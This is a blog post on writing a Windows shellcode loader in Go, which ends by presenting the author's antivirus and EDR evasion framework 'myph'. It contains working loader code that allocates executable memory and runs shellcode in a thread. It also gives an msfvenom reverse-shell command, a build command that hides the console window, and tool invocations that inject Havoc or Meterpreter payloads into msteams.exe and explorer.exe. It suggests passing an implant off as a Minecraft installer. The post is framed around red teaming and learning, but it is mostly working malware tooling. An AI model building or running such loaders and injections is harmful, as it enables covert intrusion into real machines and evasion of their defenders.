writing a shellcode-loader with Golang

I don’t know what it is about me and travelling, but I always end up writing malware instead of enjoying my vacation. This time, I’m in Japan and I decided to pick up an “old” project.

In this post, I will describe what I’ve learned through this project, and what you should probably know before attempting your own.

What is a Loader ?

Let’s start with the basics.

A shellcode loader is a piece of software designed to execute shellcode within a computer’s RAM. To understand what a shellcode loader does, we need to break it down into smaller parts:

Shellcode: a small piece of low-level code, usually written in assembly language, that performs a specific task. It is called “shellcode” because it often provides a shell (command-line interface) to interact with the system. This code is used for various purposes, including exploiting security vulnerabilities, or performing other malicious actions.
Loader: a program responsible for loading other programs or pieces of code into memory and preparing them for execution. It handles tasks such as allocating memory, copying the code into the allocated space, and setting up the execution environment.

Shellcode loaders are commonly used in cybersecurity, penetration testing, and red teaming.

Here’s a high-level overview of how a shellcode loader works:

Payload Generation: First, the shellcode needs to be crafted or generated. This involves writing the assembly instructions that will perform the desired action, such as opening a shell, creating a backdoor, or exploiting a vulnerability. Of course, you can also write it in a higher-level language.
Injection: The loader allocates memory, copies the shellcode into it, and sets up the execution context. It might achieve this through various techniques, such as injecting the shellcode into an existing process.
Execution: Once everything is ready, the loader transfers control to the shellcode, effectively executing it. Various ways to trigger the execution exist, more or less stealthy depending on the target machine.

The point of a loader is to be able to use and re-use a lot of different pieces of malware, and sometimes even combine them. This makes campaigns easier, as you can reuse code that has been discovered before, and just focus on avoiding detection. You should aim for inter-operability between tools, so that your loader can be combined with other projects, and support many different types of shellcode.

For instance, let’s say you are on a Red Team assignment, and you wish to use Havoc. But being a well-known Open-source tool, it is detected by a lot of anti-virus software… :/

So, what you do is the following:

you retrieve the executable part out of your Havoc agent, and you put it through a coat of paint, in order to hide the fact that it’s really a Havoc agent, and not the Minecraft installer you are pretending to be.

Attempting to be undetected by all anti-virus software is pointless; you should instead tailor your agent to a specific environment.

e.g. if you know your target is using BitDefender, that should be what you are trying to evade. Things don’t stay fully undetected for long, and that’s the point of a loader!

If you get detected, you can just (in theory) re-use the same shellcode, but with a different loading method and boom: fresh implant.

Here are a couple of loaders you can study, if you want to learn more about it:

Here is some relevant documentation if you want to write your own stuff:

ired.team: details a lot of process-injection techniques, which are the most common way of executing shellcode on Windows AFAIK,
msfvenom hacktrickz: details basic use of msfvenom, which you will use to create your first test shellcodes,
MSDN docs: technical documentation for Windows Win32 API functions, which you will use a lot,
crow’s nest: helpful notes on all things related to malware. He’s also got a good youtube channel,
vergilius: a reference for undocumented Windows structures (such as the PEB and TEB)

I have also started creating a Youtube playlist with interesting talks & useful beginner information. Feel free to watch it (preferably in order) !

Writing your own loader

Now that you understand what a loader is, have read some documentation, and have looked at a few projects, you feel confident you can attempt this. Let’s go over what you need before getting fully started.

Standard advice

As with any software project, generic advice applies:

don’t over-engineer shit,
don’t be afraid to fail or to debug something,
keep it simple and grow your software organically, write something when you need it,
choose a language you are comfortable with, this subject is sufficiently complicated as it is.

This could also apply:

avoid relative paths, so it can be used from any directory,
minimize external dependencies.

Measuring your project’s success really depends on why you got started with it in the first place. For me, the goal has always been to learn about Windows, Process Injection stuff, and malware in general. If it is useful to the community, even better! But the main goal has always been to learn.

It is very important when starting a project to know why you are doing this. It keeps you motivated and focused on your goal.

Win32 API

It’s the most straight-forward way to talk to the Windows kernel from userland. As mentioned before, the documentation is really thorough, although some parts (especially the most interesting ones!) are sometimes (purposefully ?) undocumented.

Through various community efforts such as ReactOS, you can still get an idea of what a given function or structure does, but keep in mind that those efforts can be imperfect or out of date.

Testing methods

The simplest way is to install a barebones Windows VM, with a shared directory to your project on your host machine. Then, take a snapshot for each anti-virus you wish to test against. Of course, you should do this before testing your malware on your virtual machine.

It can be a good idea to turn off internet access.

Also, setting resource limits can be very helpful. Memory leaks or bugs can increase resource usage and eventually crash the VM. If you have resource limits set, you would not have to worry about this.

Disabling automatic updates is also nice. It guarantees that the system will not unexpectedly change while testing. This means you will have to do the Security updates manually, which you should. However, deciding when you can update is important, as unexpected changes can be very confusing if you expect a particular behavior, and lead you to debug the wrong thing.

On the various payloads you should test

Finally, be sure to test against a variety of tools. Some payloads may execute while others will die in the background. You need to make sure your software is stable before using it against your target.

Let’s go over an example. Here, we will use CreateThread() to trigger the execution of a shellcode which will be mapped in memory by VirtualAlloc():

package main

import (
	"unsafe"

	"golang.org/x/sys/windows"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32 = windows.MustLoadDLL("kernel32.dll")
	ntdll    = windows.MustLoadDLL("ntdll.dll")

	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	CreateThread  = kernel32.MustFindProc("CreateThread")
)


func main() {

    /*
        let's say this contains your shellcode bytes
        (it must not be empty, or &shellcode[0] will panic)
    */
	var shellcode []byte

    /*
        for simplicity, we will not worry about error
        handling for now
    */

	addr, _, _ := VirtualAlloc.Call(
		0,
		uintptr(len(shellcode)),
		MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE,
	)

	_, _, _ = RtlCopyMemory.Call(
		addr,
		(uintptr)(unsafe.Pointer(&shellcode[0])),
		uintptr(len(shellcode)),
	)

	// jump to shellcode
	_, _, _ = CreateThread.Call(
		0,    // [in, optional]  LPSECURITY_ATTRIBUTES,
		0,    // [in]            SIZE_T,
		addr, // shellcode address
		0,    // [in, optional]  __drv_aliasesMem LPVOID,
		0,    // [in]            DWORD,
		0,    // [out, optional] LPDWORD
	)
}

If you test this with the following payload, it will work fine:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.2.2 LPORT=1234

Having a socket bound and calling back to you will prevent the process from exiting as long as the socket exists. However, let’s say you want to use a C2 implant instead, one that sends requests (with the HTTP protocol, for instance). It will open and close sockets many times, and will not be constrained by a single TCP socket like Metasploit’s shell_reverse_tcp.

In this case, it will not work: since you don’t wait for the thread to finish, the process will just die as soon as the newly created thread is in a waiting state.

You could fix this by adding one of the following at the end of main(), but both options have issues:

/* . . . */

func main() {


    /* . . . */

	_, _, _ = CreateThread.Call(
		0,    // [in, optional]  LPSECURITY_ATTRIBUTES,
		0,    // [in]            SIZE_T,
		addr, // shellcode address
		0,    // [in, optional]  __drv_aliasesMem LPVOID,
		0,    // [in]            DWORD,
		0,    // [out, optional] LPDWORD
	)


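    /*
        option 1: busy loop

        this sucks because CPU usage will go through
        the roof and you will get noticed for sure
    */
    for {

    }


    /*
        option 2: block forever

        this sucks too: the Go runtime does not know about
        the thread started by CreateThread, so it may decide
        that every goroutine is asleep and abort with a
        deadlock error
    */
    select {

    }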
}

The solution is to use the Win32 API to fix this, since it is what you used to create the thread in the first place:


/* . . . */

var (
	kernel32 = windows.MustLoadDLL("kernel32.dll")

    /* . . . */

	WaitForSingleObject = kernel32.MustFindProc(
		"WaitForSingleObject",
	)
)


func main() {


    /* . . . */

	// CreateThread returns a handle to the new thread, not an address
	threadHandle, _, _ := CreateThread.Call(
		0,    // [in, optional]  LPSECURITY_ATTRIBUTES,
		0,    // [in]            SIZE_T,
		addr, // shellcode address
		0,    // [in, optional]  __drv_aliasesMem LPVOID,
		0,    // [in]            DWORD,
		0,    // [out, optional] LPDWORD
	)


    /*
        wait for the thread indefinitely
        (0xFFFFFFFF is the INFINITE timeout)

        there are other techniques to do this, but this is
        the most well known AFAIK
    */
    WaitForSingleObject.Call(
        threadHandle,
        0xFFFFFFFF,
    )
}
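As an analogy, the same "wait for the worker before main returns" idea exists in pure Go. The sketch below uses sync.WaitGroup, and the runAndWait helper is a hypothetical name. It only works for goroutines, which the Go runtime knows about. A thread started through CreateThread is invisible to the runtime, which is why the Win32 wait is needed in that case.

```go
package main

import (
	"fmt"
	"sync"
)

// runAndWait starts worker in a goroutine and blocks until it has returned.
// Without the wg.Wait() call, the caller could return (and the process
// could exit) before the worker has done anything.
func runAndWait(worker func() string) string {
	var wg sync.WaitGroup
	var result string

	wg.Add(1)
	go func() {
		defer wg.Done()
		result = worker()
	}()

	wg.Wait() // blocks without burning CPU, unlike an empty for loop
	return result
}

func main() {
	out := runAndWait(func() string { return "worker finished" })
	fmt.Println(out) // prints "worker finished"
}
```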

Writing Golang malware

pros and cons

I decided to write my loader in Golang for a few reasons:

it is statically compiled, you will not have to worry about dependencies on the target machine,
the standard library supports a lot of stuff, which makes it easy to write something quickly,
it cross-compiles, which makes it easier to get a simple dev environment,
easy package management, code formatting, etc (present out of the box)

However, it is not the perfect malware-writing language obviously:

as it compiles statically, your final payload is quite large,
lots of artefacts are left in a Golang binary, which could reveal information you do not want to reveal about the program.
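To get a feel for the kind of artefacts involved, here is a small sketch in which a Go program reads back some of the metadata the toolchain embedded in it. The embeddedMetadata helper is a hypothetical name. The exact list of settings depends on your Go version and on how the binary was built, so no particular output is assumed.

```go
package main

import (
	"fmt"
	"runtime"
	"runtime/debug"
)

// embeddedMetadata lists some of the information the Go toolchain records
// inside a binary, and that the binary can read back about itself.
func embeddedMetadata() []string {
	lines := []string{"go version: " + runtime.Version()}

	info, ok := debug.ReadBuildInfo()
	if !ok {
		// No module information was embedded in this binary.
		return lines
	}

	lines = append(lines, "main module: "+info.Main.Path)
	for _, s := range info.Settings {
		lines = append(lines, "build setting: "+s.Key+"="+s.Value)
	}
	return lines
}

func main() {
	for _, line := range embeddedMetadata() {
		fmt.Println(line)
	}
}
```

The same information can be read from outside the program with `go version -m payload.exe`, so anyone who gets hold of the binary can look at it too.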

No language is perfect. If someone argues with you that this language is better than the other without providing concrete examples, they most likely don’t know what they’re actually talking about.

Just pick what you like and enjoy yourself.

A couple of quirks

Compiling your malware

In order to avoid showing little windows or printing output to the screen, here is the command you should use to compile your final payload:

GOOS=windows go build -ldflags "-s -w -H=windowsgui" -o payload.exe your_source_code.go

Anything you print to stdout will be discarded, since a program built with -H=windowsgui has no console attached. Keep that in mind when debugging your payload!

Error handling using the Win32 API

Checking for errors in Golang is usually done like so:

func someFunction() {
    something, err := SomethingThatCouldFail()
    if err != nil {
        panic(err)
    }
}

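However, this is not exactly how things work with the Win32 API: the error returned by Call() is built from GetLastError() and is never nil, even when the call succeeds. This is what a naive check would look like with our example from before: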

package main

import (
	"fmt"
	"syscall"
	"unsafe"

	"golang.org/x/sys/windows"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32 = windows.MustLoadDLL("kernel32.dll")
	ntdll    = windows.MustLoadDLL("ntdll.dll")

	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")

    /* . . . */
)

func main() {

	var shellcode []byte
	shellcode = decrypt(shellcodeBytes, key)

	addr, _, err := VirtualAlloc.Call(
		0,
		uintptr(len(shellcode)),
		MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE,
	)

    /*
        Checking the error message we got from the `err`
        object (in French, in this case)
    */
	if err != nil && err.Error() != "L’opération a réussi." {
		fmt.Println("failed to alloc memory")
		fmt.Println(err)
		syscall.Exit(0)
	}

    /* . . . */

}

You can see the problem, right ? If the target machine is not in French, we will fall into the if statement and exit the program. But maybe our VirtualAlloc() succeeded !

To properly check for errors, here is what you should do:

package main

import (
	"fmt"
	"syscall"
	"unsafe"

	"golang.org/x/sys/windows"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32 = windows.MustLoadDLL("kernel32.dll")
	ntdll    = windows.MustLoadDLL("ntdll.dll")

	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")

    /* . . . */
)

func main() {

	var shellcode []byte

	addr, _, err := VirtualAlloc.Call(
		0,
		uintptr(len(shellcode)),
		MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE,
	)

    /*
        Checking the return value of the call
        (VirtualAlloc returns NULL on failure),
        and retrieving the error if any
    */
	if addr == 0 {
		fmt.Println("failed to alloc memory")
		panic(err)
	}

    /* . . . */

}

This way, you can check for errors on any system, and Golang even gives you a nice error message instead of the error code.

Presenting `myph`

To wrap up this blog post, I’d like to present my project (which is still a work in progress), called myph (version 1.1.0 at the time of writing).

You can get it on Github, or through the go package repository. Its usage is well-described by the --help section:

              ...                                        -==[ M Y P H ]==-
             ;::::;
           ;::::; :;                                    In loving memory of
         ;:::::'   :;                               Wassyl Iaroslavovytch Slipak
        ;:::::;     ;.
       ,:::::'       ;           OOO                       (1974 - 2016)
       ::::::;       ;          OOOOO
       ;:::::;       ;         OOOOOOOO
      ,;::::::;     ;'         / OOOOOOO
    ;::::::::: . ,,,;.        /  / DOOOOOO
  .';:::::::::::::::::;,     /  /     DOOOO
 ,::::::;::::::;;;;::::;,   /  /        DOOO        AV / EDR evasion framework
; :::::: '::::::;;;::::: ,#/  /          DOOO           to pop shells and
: ::::::: ;::::::;;::: ;::#  /            DOOO        make the blue team cry
:: ::::::: ;:::::::: ;::::# /              DOO
 : ::::::: ;:::::: ;::::::#/               DOO
 ::: ::::::: ;; ;:::::::::##                OO       written with <3 by djnn
 :::: ::::::: ;::::::::;:::#                OO                ------
 ::::: ::::::::::::;' :;::#                O             https://djnn.sh
   ::::: ::::::::;  /  /  :#
   :::::: :::::;   /  /    #

Usage:
  myph [flags]

Flags:
  -e, --encryption encKind   encryption method. (allowed: AES, chacha20, XOR, blowfish) (default AES)
  -h, --help                 help for myph
  -k, --key string           encryption key, auto-generated if empty. (if used by --encryption)
  -f, --out string           output name (default "payload.exe")
  -p, --process string       target process to inject shellcode to (default "cmd.exe")
  -s, --shellcode string     shellcode path (default "msf.raw")
      --sleep-time uint      sleep time in seconds before executing loader (default: 0)
  -t, --technique string     shellcode-loading technique (allowed: CRT, ProcessHollowing, CreateThread, Syscall) (default "CRT")
  -v, --version              version for myph

Here are a few examples of how you can use it:

# inject a havoc payload into microsoft teams using the method from before !
> myph --shellcode havoc.x64.bin --process msteams.exe --technique CreateThread --encryption chacha20

# inject a MSF payload into explorer.exe to get a TCP or meterpreter callback
> myph --shellcode msf.raw --process explorer.exe

See you next time :)~